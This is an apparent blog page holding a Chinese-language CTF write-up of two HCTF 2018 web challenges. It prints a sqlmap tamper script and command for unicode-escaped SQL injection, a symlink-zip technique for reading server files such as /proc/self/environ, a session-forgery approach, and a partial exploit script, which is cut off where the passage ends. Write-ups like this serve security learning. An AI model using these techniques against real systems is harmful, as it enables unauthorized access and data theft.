<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">






  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-center-circle.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon1.ico?v=6.3.0">


  <link rel="mask-icon" href="/images/favicon1.ico?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="近来有时间补了一下之前比赛遗留下来的wp">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="HCTF 2018 Web Writeup">
<meta property="og:url" content="http://0day.design/2019/02/05/HCTF 2018 Web WriteUp/index.html">
<meta property="og:site_name" content="Passer6y&#39;s Blog">
<meta property="og:description" content="近来有时间补了一下之前比赛遗留下来的wp">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/wolvkvlhm12cd4tmmgs8wl51/image_1d2pmhrhn131a15m1s633c31ok69.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/pvhr9rlcy3oabo1asww1asnq/image_1d2pmo0qfnr8s2vn8h1ghn1ndam.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/wmbck0yks0xuh38uoolksvl0/image_1d2pmp8e0lbi1s0c1iom1jvb5q713.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/1g24nx907bes3heygv1kgce4/image_1d2pmq8bs1uai3g8v08vqb17661g.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/htskjw1ru8rlbgygwjblwt04/image_1d2q0ca8db591201295cagmai1t.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/dpu0i90uerdjmjb5fuqeglfx/image_1d2q2gce28uf9qd1unfvff1etr9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/zwsywi592apqetatwhdkpwid/image_1d2sinmfjerubu1mqb3ubp2n9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/x5hfrpxwel5kry6wjccq89bu/image_1d2tn76jklvg18c58u5q8ldabm.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/3dfj01cqoeqf49nmy00uetew/image_1d2tn8g1f13b411lssterek13qp1j.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/amiy8nrn32hi0olh92x4pxe0/image_1d2tn9v15pofqka17t56l3bvm20.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/ymzwljn92zize9vd6skmvsds/image_1d2tqatlg1jjpkre9ginlg1mgo9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/gi0q1n5gqdhj6ddlrruvgmgs/image_1d2tqlpt2935hbp1ug01hc91ogi9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/x8p4udzjqszajlvh420l70ia/image_1d2tr01251e8bmvq5r8p43i8m.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/f1ocjg7yf4dva04z7tuqsvq1/image_1d2trt9n9125b1u8bcajrf1jl613.png">
<meta property="og:updated_time" content="2019-02-05T07:41:34.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="HCTF 2018 Web Writeup">
<meta name="twitter:description" content="近来有时间补了一下之前比赛遗留下来的wp">
<meta name="twitter:image" content="http://static.zybuluo.com/Passer6y/wolvkvlhm12cd4tmmgs8wl51/image_1d2pmhrhn131a15m1s633c31ok69.png">



  <link rel="alternate" href="/atom.xml" title="Passer6y's Blog" type="application/atom+xml" />




  <link rel="canonical" href="http://0day.design/2019/02/05/HCTF 2018 Web WriteUp/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>HCTF 2018 Web Writeup | Passer6y's Blog</title>
  






  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?14e9c0326e763de8b0a61711cc963a58";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Passer6y's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-ctf">
    <a href="/categories/CTF/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-flag"></i> <br />CTF</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-web">
    <a href="/categories/Web/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-jsfiddle"></i> <br />Web</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-code">
    <a href="/categories/Code/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-code"></i> <br />Code</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-internet">
    <a href="/categories/Internet/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-wifi"></i> <br />内网渗透</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-others">
    <a href="/categories/Others/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-eye"></i> <br />Others</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-folder-open"></i> <br />归档</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/About/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />关于</a>
  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />Search</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://0day.design/2019/02/05/HCTF 2018 Web WriteUp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Passer6y">
      <meta itemprop="description" content="A salty fish">
      <meta itemprop="image" content="/images/21.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Passer6y's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">HCTF 2018 Web Writeup
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2019-02-05 15:51:00 / Modified: 15:41:34" itemprop="dateCreated datePublished" datetime="2019-02-05T15:51:00+08:00">2019-02-05</time>
            

            
              

              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a></span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/02/05/HCTF 2018 Web WriteUp/#comments" itemprop="discussionUrl">
                  <span class="post-meta-item-text">Comments: </span> <span class="post-comments-count valine-comment-count" data-xid="/2019/02/05/HCTF 2018 Web WriteUp/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>近来有时间补了一下之前比赛遗留下来的wp<br><a id="more"></a></p>
<h2 id="Kzone"><a href="#Kzone" class="headerlink" title="Kzone"></a>Kzone</h2><p>仿的一个qq空间的钓鱼站，<a href="http://www.zip下载源码后，尝试各个功能点审计，动态调试后，发现正常登录的功能点不会设置一个名为`login_data`参数的cookie，而这个点可以用来登录，" target="_blank" rel="noopener">www.zip下载源码后，尝试各个功能点审计，动态调试后，发现正常登录的功能点不会设置一个名为`login_data`参数的cookie，而这个点可以用来登录，</a> 也算是出题人后来加上的功能点，然后将其当成考点？</p>
<p>登录的时候是不会自动带上这个参数的：<br><img src="http://static.zybuluo.com/Passer6y/wolvkvlhm12cd4tmmgs8wl51/image_1d2pmhrhn131a15m1s633c31ok69.png" alt="image_1d2pmhrhn131a15m1s633c31ok69.png-331kB"><br>我们手动设置后，然后将其导入到浏览器cookie中，可以用这个cookie登录。</p>
<p>其过程为：<br>在后台登录前，会包含一个共有的文件：<br><img src="http://static.zybuluo.com/Passer6y/pvhr9rlcy3oabo1asww1asnq/image_1d2pmo0qfnr8s2vn8h1ghn1ndam.png" alt="image_1d2pmo0qfnr8s2vn8h1ghn1ndam.png-35.3kB"></p>
<p>这里重点关注member.php：<br><img src="http://static.zybuluo.com/Passer6y/wmbck0yks0xuh38uoolksvl0/image_1d2pmp8e0lbi1s0c1iom1jvb5q713.png" alt="image_1d2pmp8e0lbi1s0c1iom1jvb5q713.png-177.7kB"></p>
<p>使用cookie登录的数据会进行一次json_decode解码：<br><img src="http://static.zybuluo.com/Passer6y/1g24nx907bes3heygv1kgce4/image_1d2pmq8bs1uai3g8v08vqb17661g.png" alt="image_1d2pmq8bs1uai3g8v08vqb17661g.png-279.8kB"></p>
<p>这里学习了有的师傅使用了json_decode()会unicode自动解码的特性绕过。</p>
<p>嫖了一个tamper脚本<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line">from lib.core.enums import PRIORITY</span><br><span class="line">__priority__ = PRIORITY.LOW</span><br><span class="line"></span><br><span class="line">def dependencies():</span><br><span class="line">    pass</span><br><span class="line"></span><br><span class="line">def tamper(payload, **kwargs):</span><br><span class="line">    data = &apos;&apos;&apos;&#123;&quot;admin_user&quot;:&quot;%s&quot;&#125;;&apos;&apos;&apos;</span><br><span class="line">    payload = payload.lower()</span><br><span class="line"></span><br><span class="line">    payload = payload.replace(&apos;u&apos;, &apos;\u0075&apos;)</span><br><span class="line">    payload = payload.replace(&apos;o&apos;, &apos;\u006f&apos;)</span><br><span class="line">    payload = payload.replace(&apos;i&apos;, &apos;\u0069&apos;)</span><br><span class="line">    payload = payload.replace(&apos;\&apos;&apos;, &apos;\u0027&apos;)</span><br><span class="line">    payload = payload.replace(&apos;\&quot;&apos;, &apos;\u0022&apos;)</span><br><span class="line">    payload = payload.replace(&apos; &apos;, &apos;\u0020&apos;)</span><br><span class="line">    payload = payload.replace(&apos;s&apos;, &apos;\u0073&apos;)</span><br><span class="line">    payload = payload.replace(&apos;#&apos;, &apos;\u0023&apos;)</span><br><span class="line">    payload = payload.replace(&apos;&gt;&apos;, &apos;\u003e&apos;)</span><br><span class="line">    payload = payload.replace(&apos;&lt;&apos;, &apos;\u003c&apos;)</span><br><span class="line">    payload = payload.replace(&apos;-&apos;, &apos;\u002d&apos;)</span><br><span class="line">    payload = payload.replace(&apos;=&apos;, &apos;\u003d&apos;)</span><br><span class="line">    payload = payload.replace(&apos;f1a9&apos;, &apos;F1a9&apos;)</span><br><span class="line">    payload = payload.replace(&apos;f1&apos;, &apos;F1&apos;)</span><br><span class="line">    return data % payload</span><br></pre></td></tr></table></figure></p>
<p><code>python sqlmap.py -r jsondecode --tamper &quot;jsondecodeBypassTamper.py&quot; -v 3 --dbs --dbms=mysql --level 2</code><br><img src="http://static.zybuluo.com/Passer6y/htskjw1ru8rlbgygwjblwt04/image_1d2q0ca8db591201295cagmai1t.png" alt="image_1d2q0ca8db591201295cagmai1t.png-272.6kB"></p>
<p>然鹅预期解是读install.sql，会发现数据表引擎使用的是<code>innodb</code>。<br>MySQL 5.7 之后的版本，在其自带的 mysql 库中，新增了 innodb_table_stats 和 innodb_index_stats 这两张日志表。如果数据表的引擎是innodb ，则会在这两张表中记录表、键的信息。</p>
<p>因为过滤了or，所以布尔盲注的时候利用setcookie次数造成的差异进行注入。</p>
<p>造成布尔盲注的流程：<br><img src="http://static.zybuluo.com/Passer6y/dpu0i90uerdjmjb5fuqeglfx/image_1d2q2gce28uf9qd1unfvff1etr9.png" alt="image_1d2q2gce28uf9qd1unfvff1etr9.png-265.5kB"><br>如果查询用户名不为空，且密码和数据库中哈希进行弱类型比较绕过成功，则登录成功。<br>如果查询用户名为空，当然此时密码肯定也不会和空相等，所以会有四次set-cookie</p>
<p>当然也可以在密码一直比较错误的情形下利用：<br>用户名字段查询不到东西(为空)：set-cookie四次<br>用户名字段查询到东西：set-cookoe两次</p>
<h2 id="HideAndSeek"><a href="#HideAndSeek" class="headerlink" title="HideAndSeek"></a>HideAndSeek</h2><p>注册后题目是一个上传zip文件的地方，会自动解压并渲染出文件内容。<br>奇怪的是提交完之后直接就在这样一个<br><code>http://206.189.144.143:20000/upload</code>路径下渲染了，也没有具体的文件名等信息。<br><img src="http://static.zybuluo.com/Passer6y/zwsywi592apqetatwhdkpwid/image_1d2sinmfjerubu1mqb3ubp2n9.png" alt="image_1d2sinmfjerubu1mqb3ubp2n9.png-135.9kB"></p>
<p>如果再去访问upload会进行跳转，所以猜测是渲染一次之后就删了。<br>尝试构造文件名<code>../../../../../../etc/passwd</code>的压缩文件(瞎试的)，返回一片空白..<br>其次压缩文件里有目录结构，也会返回空白。</p>
<p>网上找到一篇文件上传软连接的文章：<a href="https://xz.aliyun.com/t/2589" target="_blank" rel="noopener">https://xz.aliyun.com/t/2589</a></p>
<p>构造软连接压缩文件<br><img src="http://static.zybuluo.com/Passer6y/x5hfrpxwel5kry6wjccq89bu/image_1d2tn76jklvg18c58u5q8ldabm.png" alt="image_1d2tn76jklvg18c58u5q8ldabm.png-53kB"></p>
<p>zip -y 表示存储链接文件，不会替代源文件<br><img src="http://static.zybuluo.com/Passer6y/3dfj01cqoeqf49nmy00uetew/image_1d2tn8g1f13b411lssterek13qp1j.png" alt="image_1d2tn8g1f13b411lssterek13qp1j.png-11.2kB"></p>
<p>上传压缩文件后得到：<br><img src="http://static.zybuluo.com/Passer6y/amiy8nrn32hi0olh92x4pxe0/image_1d2tn9v15pofqka17t56l3bvm20.png" alt="image_1d2tn9v15pofqka17t56l3bvm20.png-87.2kB"></p>
<p>现在有了一个任意文件读取，接下来得猜测目录,尝试读取proc伪文件<br>`/proc/self/cwd  读不到东西，猜想原因如下：<br><img src="http://static.zybuluo.com/Passer6y/ymzwljn92zize9vd6skmvsds/image_1d2tqatlg1jjpkre9ginlg1mgo9.png" alt="image_1d2tqatlg1jjpkre9ginlg1mgo9.png-40.7kB"></p>
<p>再试试读环境变量：<code>/proc/self/environ</code>,这里读到了很多相关文件信息<br><img src="http://static.zybuluo.com/Passer6y/gi0q1n5gqdhj6ddlrruvgmgs/image_1d2tqlpt2935hbp1ug01hc91ogi9.png" alt="image_1d2tqlpt2935hbp1ug01hc91ogi9.png-48kB"></p>
<p>再读一下：<code>/app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.ini</code><br><img src="http://static.zybuluo.com/Passer6y/x8p4udzjqszajlvh420l70ia/image_1d2tr01251e8bmvq5r8p43i8m.png" alt="image_1d2tr01251e8bmvq5r8p43i8m.png-33.6kB"></p>
<blockquote>
<p>知识面太窄了，没接触过flask，后来才知道这是源码路径：<code>/app/hard_t0_guess_n9f5a95b5ku9fg/hard_t0_guess_also_df45v48ytj9_main.py</code></p>
</blockquote>
<p>反正源码就大概在/app目录下，之后就是脑洞和经验了.. wp说由cookie可以猜到是flask，然后提示用的docker，默认在/app/main.py，所以去读/app/main.py<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line">from flask import Flask</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.route(&quot;/&quot;)</span><br><span class="line">def hello():</span><br><span class="line">    version = &quot;&#123;&#125;.&#123;&#125;&quot;.format(sys.version_info.major, sys.version_info.minor)</span><br><span class="line">    message = &quot;Hello World from Flask in a uWSGI Nginx Docker container with Python &#123;&#125; (default)&quot;.format(</span><br><span class="line">        version</span><br><span class="line">    )</span><br><span class="line">    return message</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    app.run(host=&quot;0.0.0.0&quot;, debug=True, port=80)</span><br></pre></td></tr></table></figure></p>
<p>读出源码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">from flask import Flask,session,render_template,redirect, url_for, escape, request,Response</span><br><span class="line">import uuid</span><br><span class="line">import base64</span><br><span class="line">import random</span><br><span class="line">import flag</span><br><span class="line">from werkzeug.utils import secure_filename</span><br><span class="line">import os</span><br><span class="line">random.seed(uuid.getnode())</span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[&apos;SECRET_KEY&apos;] = str(random.random()*100)</span><br><span class="line">app.config[&apos;UPLOAD_FOLDER&apos;] = &apos;./uploads&apos;</span><br><span class="line">app.config[&apos;MAX_CONTENT_LENGTH&apos;] = 100 * 1024</span><br><span class="line">ALLOWED_EXTENSIONS = set([&apos;zip&apos;])</span><br><span class="line"></span><br><span class="line">def allowed_file(filename):</span><br><span class="line">    return &apos;.&apos; in filename and \</span><br><span class="line">           filename.rsplit(&apos;.&apos;, 1)[1].lower() in ALLOWED_EXTENSIONS</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.route(&apos;/&apos;, methods=[&apos;GET&apos;])</span><br><span class="line">def index():</span><br><span class="line">    error = request.args.get(&apos;error&apos;, &apos;&apos;)</span><br><span class="line">    if(error == &apos;1&apos;):</span><br><span class="line">        session.pop(&apos;username&apos;, None)</span><br><span class="line">        return render_template(&apos;index.html&apos;, forbidden=1)</span><br><span class="line"></span><br><span class="line">    if &apos;username&apos; in session:</span><br><span class="line">        return render_template(&apos;index.html&apos;, user=session[&apos;username&apos;], flag=flag.flag)</span><br><span class="line">    else:</span><br><span class="line">        return render_template(&apos;index.html&apos;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.route(&apos;/login&apos;, methods=[&apos;POST&apos;])</span><br><span class="line">def login():</span><br><span class="line">    username=request.form[&apos;username&apos;]</span><br><span class="line">    password=request.form[&apos;password&apos;]</span><br><span class="line">    if request.method == &apos;POST&apos; and username != &apos;&apos; and password != &apos;&apos;:</span><br><span class="line">        if(username == &apos;admin&apos;):</span><br><span class="line">            return redirect(url_for(&apos;index&apos;,error=1))</span><br><span class="line">        session[&apos;username&apos;] = username</span><br><span class="line">    return redirect(url_for(&apos;index&apos;))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.route(&apos;/logout&apos;, methods=[&apos;GET&apos;])</span><br><span class="line">def logout():</span><br><span class="line">    session.pop(&apos;username&apos;, None)</span><br><span class="line">    return redirect(url_for(&apos;index&apos;))</span><br><span class="line"></span><br><span class="line">@app.route(&apos;/upload&apos;, methods=[&apos;POST&apos;])</span><br><span class="line">def upload_file():</span><br><span class="line">    if &apos;the_file&apos; not in request.files:</span><br><span class="line">        return redirect(url_for(&apos;index&apos;))</span><br><span class="line">    file = request.files[&apos;the_file&apos;]</span><br><span class="line">    if file.filename == &apos;&apos;:</span><br><span class="line">        return redirect(url_for(&apos;index&apos;))</span><br><span class="line">    if file and allowed_file(file.filename):</span><br><span class="line">        filename = secure_filename(file.filename)</span><br><span class="line">        file_save_path = os.path.join(app.config[&apos;UPLOAD_FOLDER&apos;], filename)</span><br><span class="line">        if(os.path.exists(file_save_path)):</span><br><span class="line">            return &apos;This file already exists&apos;</span><br><span class="line">        file.save(file_save_path)</span><br><span class="line">    else:</span><br><span class="line">        return &apos;This file is not a zipfile&apos;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    try:</span><br><span class="line">        extract_path = file_save_path + &apos;_&apos;</span><br><span class="line">        os.system(&apos;unzip -n &apos; + file_save_path + &apos; -d &apos;+ extract_path)</span><br><span class="line">        read_obj = os.popen(&apos;cat &apos; + extract_path + &apos;/*&apos;)</span><br><span class="line">        file = read_obj.read()</span><br><span class="line">        read_obj.close()</span><br><span class="line">        os.system(&apos;rm -rf &apos; + extract_path)</span><br><span class="line">    except Exception as e:</span><br><span class="line">        file = None</span><br><span class="line"></span><br><span class="line">    os.remove(file_save_path)</span><br><span class="line">    if(file != None):</span><br><span class="line">        if(file.find(base64.b64decode(&apos;aGN0Zg==&apos;).decode(&apos;utf-8&apos;)) != -1):</span><br><span class="line">            return redirect(url_for(&apos;index&apos;, error=1))</span><br><span class="line">    return Response(file)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == &apos;__main__&apos;:</span><br><span class="line">    #app.run(debug=True)</span><br><span class="line">    app.run(host=&apos;127.0.0.1&apos;, debug=True, port=10008)</span><br></pre></td></tr></table></figure></p>
<p>看到他import了flag，直接去读flag，然鹅..直接被拦了<br><img src="http://static.zybuluo.com/Passer6y/f1ocjg7yf4dva04z7tuqsvq1/image_1d2trt9n9125b1u8bcajrf1jl613.png" alt="image_1d2trt9n9125b1u8bcajrf1jl613.png-61.6kB"></p>
<p>所以现在思路就是越权成为admin，这里使用的一个固定的随机数种子，uuid.getnode()获得10进制mac地址，可以在/sys/class/net/eth0/address读到mac地址，所以可以伪造session越权称为admin，</p>
<p>读到mac地址：<code>02:42:ac:11:00:02</code>，在线转成10进制：<br><a href="https://www.vultr.com/tools/mac-converter/?mac_address=02%3A42%3Aac%3A11%3A00%3A02" target="_blank" rel="noopener">https://www.vultr.com/tools/mac-converter/?mac_address=02%3A42%3Aac%3A11%3A00%3A02</a><br>得到种子：2485377892354</p>
<p>然后本地搭一下flask环境拿到session即可得到flag。</p>
<p>最后看了其他师傅们的wp，还可以读.bash_history等等，这里嫖了一个exp(我全程手动操作的..)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import random </span><br><span class="line">import os</span><br><span class="line">import string</span><br><span class="line">import time</span><br><span class="line">import zipfile</span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line">def generate_zip(path,i):</span><br><span class="line">    zip_name =  &apos;moxiaoxi&apos;+str(i)+&apos;.zip&apos;</span><br><span class="line">    link_namme = &apos;moxiaoxi&apos;+str(i)</span><br><span class="line">    os.system(&quot;ln -s &#123;&#125; 